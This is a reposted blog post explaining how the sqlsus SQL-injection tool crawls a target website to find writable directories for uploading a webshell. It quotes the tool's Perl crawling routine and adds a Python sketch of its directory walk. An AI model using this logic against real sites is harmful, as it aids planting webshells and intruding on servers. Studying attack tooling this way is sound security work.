
Analysis of the code behind sqlsus's automatic search for writable upload directories

2011-11-29 21:33
Reposted from: http://www.52harry.com/program/python/2011-11-08/493.html

sqlsus is a rather good MySQL injection tool. In my experience its two best features are that it retrieves data through the injection very quickly, and that it can automatically search for writable directories and upload a webshell. Here we locate the code implementing that feature and analyze it.

# TODO handle src tags rather than just img src
# (excerpt from sqlsus; relies on WWW::Mechanize and the %conf settings)
sub upload_uploader {
    if (@conf::upload_directories) {
        for my $dir (@conf::upload_directories) {
            if (&try_to_upload_uploader($dir)) {
                return 1;
            }
        }
    } else {
        my @urls;
        push @urls, $conf::url_start, $conf::url_start, $conf::url_base;
        # without script
        $urls[0] =~ s#/[^/]+$##;
        print STDERR "[+] Crawling the website for candidate directories at max depth $conf::max_depth\n";
        my $depth = 0;
        my $mech = WWW::Mechanize->new();
        my @fetched_urls = ();
        my @directories = qw(/);
        while ($depth != $conf::max_depth) {
            $depth++;
            for my $url (@urls, @directories) {
                return 0 if $main::interrupt;
                next if grep {$_ eq $url} @fetched_urls;
                push @fetched_urls, $url;
                next if $url =~ /\.(gif|jpg|jpeg|png|bmp|css)$/i;
                if ($conf::debug) { print STDERR "[$depth] Fetching $url : " }
                $mech->get( "$url" );
                sleep($conf::sleep_between_hits);
                if ($conf::debug) { print STDERR $mech->response()->code . " (" . $mech->response()->message . ")\n" }
                if (not $mech->response()->is_success) {
                    next;
                }
                # parse all links / add them to the download queue if not seen yet
                for my $link ($mech->find_all_links()) {
                    my $url = $link->url_abs()->abs;
                    # only consider local links
                    next unless ($url =~ /^$conf::url_base/);
                    my $url_without_args = $url;
                    $url_without_args =~ s/\?.*//;
                    # if the url has not been fetched yet, and is not in the "to fetch" list
                    push(@urls, "$url") unless grep(/^$url_without_args/, @urls);
                    # extract absolute directory
                    $url =~ s/^$conf::url_base\///;
                    $url =~ s#/[^/]*$#/#;
                    # and stack "new" directories
                    while ($url =~ m#/.+$#) {
                        if (not grep($_ eq $url, @directories)) {
                            if (&try_to_upload_uploader($url)) {
                                return 1;
                            } else {
                                push(@directories, $url);
                            }
                        }
                        $url =~ s#/[^/]+(/?)$#$1#;
                    }
                }
                # parse all images to get more directories
                # TODO parse src='' SRC="" etc.. to get directories from javascript, movies..
                for my $image ($mech->find_all_images) {
                    my $url = $image->url_abs();
                    # print "[IMG] $url\n";
                    # only consider local links
                    next unless ($url =~ /^$conf::url_base/);
                    # remove everything after last /
                    $url =~ s/\/[^\/]+$/\//;
                    # remove $conf::url_base
                    $url =~ s/^$conf::url_base\///;
                    $url =~ s#/[^/]*$#/#;
                    # and stack "new" directories
                    while ($url =~ m#/.+$#) {
                        if (not grep($_ eq $url, @directories)) {
                            if (&try_to_upload_uploader($url)) {
                                return 1;
                            } else {
                                push(@directories, $url);
                            }
                        }
                        $url =~ s#/[^/]+(/?)$#$1#;
                    }
                }
            }
        }
    }
}
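The engine of both directory-stacking loops is the pair of regexes `m#/.+$#` and `s#/[^/]+(/?)$#$1#`: starting from a page or image path, the inner while loop strips one trailing path component per iteration, so a single deep URL yields every ancestor directory as an upload candidate (sqlsus calls `try_to_upload_uploader` on each one; the sketch below only collects them). A minimal sketch of that walk, written in Python for brevity, with a function name of my own choosing:

```python
import re

def candidate_directories(path):
    """Mimic sqlsus's directory walk: given a path relative to the
    web root (e.g. "/a/b/c.php"), return every ancestor directory,
    deepest first, as the while-loop in upload_uploader does."""
    # keep only the directory part: "/a/b/c.php" -> "/a/b/"
    path = re.sub(r'/[^/]*$', '/', path)
    dirs = []
    # loop while anything remains after the leading "/"  (m#/.+$#)
    while re.search(r'/.+$', path):
        if path not in dirs:
            dirs.append(path)
        # strip one trailing component  (s#/[^/]+(/?)$#$1#)
        path = re.sub(r'/[^/]+(/?)$', r'\1', path)
    return dirs

print(candidate_directories("/images/2011/banner.png"))
# -> ['/images/2011/', '/images/']
```

Note how one crawled image URL is enough to probe every directory on its path, which is what makes the crawl cheap relative to the number of candidates it generates.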

Above is the core code implementing the feature; let's break it down step by step.

Argh... I've chewed too much betel nut and I'm buzzing, so the detailed analysis will have to wait. In short:

it collects every link on the site and analyzes the directory depth, finding the directories that contain all the image files; it then strips the protocol prefix (the http:// part) and compares each URL against the site's base URL to determine the image directory's actual path on the server. This is how it finds writable directories under the server's web root.
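The per-link step described above can be sketched like this in Python (`URL_BASE` and the function name are hypothetical stand-ins; sqlsus itself does this in Perl with WWW::Mechanize and `$conf::url_base`):

```python
from urllib.parse import urlsplit

# hypothetical site root, playing the role of $conf::url_base
URL_BASE = "http://target.example.com"

def local_dir_from_link(url):
    """Return a link's directory relative to the site root, or None
    for off-site links: http://target.example.com/img/a.png -> /img/"""
    if not url.startswith(URL_BASE):
        return None            # only consider local links
    path = urlsplit(url).path  # drops scheme, host, and any ?query
    return path.rsplit('/', 1)[0] + '/'

print(local_dir_from_link("http://target.example.com/img/2011/a.png"))
# -> /img/2011/
```

Each directory obtained this way is then probed for writability by attempting the upload, exactly as `try_to_upload_uploader` does in the code above.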